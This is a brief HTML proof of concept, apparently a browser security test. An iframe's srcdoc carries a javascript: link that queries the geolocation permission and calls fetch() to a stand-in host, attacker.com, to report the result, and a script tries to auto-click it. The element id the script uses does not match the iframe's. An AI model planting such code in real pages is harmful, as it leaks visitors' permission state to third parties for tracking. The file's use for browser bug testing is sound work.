<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGenaZBGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGenaZBGGGGG.addEventListener("load",()=>{GGGGGenaZBGGGGG.srcdoc="<a id=a1 href='javascript:navigator.permissions.query({name:`geolocation`}).then(r=>{if(r.state!=`denied`)fetch(`https://attacker.com/report/report?query=1`)})'>click<\/a><script>GGGGenaZBGGGG.click();<\/script>";},{once:true});
};
</script>
</body>
</html>